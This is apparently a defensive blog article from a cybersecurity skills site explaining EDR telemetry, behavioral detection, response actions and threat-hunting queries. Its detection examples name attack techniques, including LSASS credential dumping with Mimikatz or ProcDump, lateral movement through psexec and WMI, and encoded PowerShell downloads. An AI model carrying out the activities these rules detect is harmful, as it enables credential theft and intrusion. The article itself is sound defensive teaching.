EDR: Endpoint Detection, Response, and Threat Hunting
Part of the Cybersecurity Skills Guide — This article is one deep-dive in our complete guide series.
By HADESS Team | February 28, 2026 | Updated: February 28, 2026 | 5 min read
Endpoint Detection and Response (EDR) gives you visibility into what is actually happening on every workstation and server in your environment. Where antivirus asks “is this file known-bad?”, EDR asks “is this behavior suspicious?” — a far more useful question when attackers increasingly operate with fileless techniques, living-off-the-land binaries, and custom tooling that AV signatures will never catch.
Endpoint Visibility
EDR agents collect telemetry on process execution, file system changes, registry modifications, network connections, and loaded modules. This telemetry is the raw material for both automated detection and manual threat hunting.
Key telemetry points that matter for detection:
- Process creation: executable path, command-line arguments, parent process, user context. A
cmd.exespawned bywinword.exeis worth investigating regardless of what the command does. - Network connections: which processes are making outbound connections, to where, and how often. Beaconing patterns (regular intervals with small jitter) are a C2 indicator.
- File operations: new executables written to disk, modifications to system files, changes in auto-start locations.
- Registry changes: modifications to Run keys, service registrations, COM object registrations — common persistence mechanisms.
- Module loads: DLLs loaded into processes. A process loading
winhttp.dllthat normally does not make HTTP requests is anomalous.
The quality of your detections depends directly on the quality of telemetry your EDR collects. Evaluate EDR products on telemetry depth, not just detection count. Some products hook more API calls and collect more granular data than others.
Behavioral Detection
Behavioral detection rules look for patterns of activity rather than specific indicators. This approach catches novel threats that signature-based detection misses.
Examples of behavioral detections:
- LSASS access: any process reading memory from
lsass.exeis likely attempting credential dumping (Mimikatz, ProcDump, direct syscalls). Whitelist known legitimate tools and alert on everything else. - Unusual parent-child relationships:
outlook.exespawningpowershell.exe,excel.exespawningcmd.exe,services.exespawning anything other than expected services. - Script execution chains:
mshta.execallingwscript.execallingpowershell.exe— each hop adds obfuscation, and the chain itself is the indicator. - Lateral movement patterns:
psexecservice creation, WMI remote process creation, remote scheduled task registration, or remote service installation from a workstation.
Tune behavioral rules carefully. “PowerShell spawned by Explorer” fires legitimately when users run scripts. “PowerShell spawned by Explorer with encoded command-line arguments downloading content from an external URL” is specific enough to be useful.
Response Actions
When a detection fires and an analyst confirms it is a true positive, EDR provides response capabilities:
- Endpoint isolation: cut the host off from the network while maintaining the EDR management channel. This contains the threat immediately while preserving evidence.
- Process termination: kill the malicious process. Be aware that some malware restarts itself through persistence mechanisms — killing the process without removing persistence just buys time.
- File quarantine: remove malicious files to a quarantine vault where they can be analyzed without execution risk.
- Live response shell: connect to the endpoint for remote investigation — run commands, collect files, check configurations without physically touching the machine.
Automate response for high-confidence detections. If your EDR detects Mimikatz execution with 99% confidence, auto-isolating the endpoint and disabling the associated user account is reasonable. For lower-confidence detections, alert the analyst and let them decide.
Hunting Queries
Threat hunting uses EDR telemetry proactively, searching for threats that automated detections missed. Write hunting queries based on threat intelligence, ATT&CK techniques, or anomaly detection.
Effective hunting queries:
- Processes running from unusual directories (
C:\ProgramData,C:\Users\Public, temp folders) - Network connections to newly registered domains (domain age less than 30 days)
- Scheduled tasks created in the last 7 days with encoded PowerShell commands
- Processes that have been running continuously for extended periods with periodic network activity
Document successful hunts and convert them into automated detection rules. Every threat you find through hunting represents a gap in your automated detection that should be closed.
Next Steps
- Assess your endpoint security skills with the skills assessment
- Browse detection and hunting topics in the skills library
- Use the coaching tool to build a threat hunting practice plan
Related Guides in This Series
- Firewall Management: Rules, Zones, and Change Control
- Hardware Security Modules: Key Management and Compliance
- IPTables: Linux Packet Filtering and NAT Configuration
Take the Next Step
Browse 80+ skills on HADESS. Go to the browse 80+ skills on hadess on HADESS.
See your certification roadmap. Check out the see your certification roadmap.
Get started free — Create your HADESS account and access all career tools.
Frequently Asked Questions
How long does it take to learn this skill?
Most practitioners build working proficiency in 4-8 weeks of dedicated study with hands-on practice. Mastery takes longer and comes primarily through on-the-job experience.
Do I need certifications for this skill?
Certifications validate your knowledge to employers but are not strictly required. Hands-on experience and portfolio projects often carry more weight in technical interviews. Check the certification roadmap for relevant options.
What career paths use this skill?
Explore the career path explorer to see which roles require this skill and how it fits into different cybersecurity specializations.
—
HADESS Team consists of cybersecurity practitioners, hiring managers, and career strategists who have collectively spent 50+ years in the field.
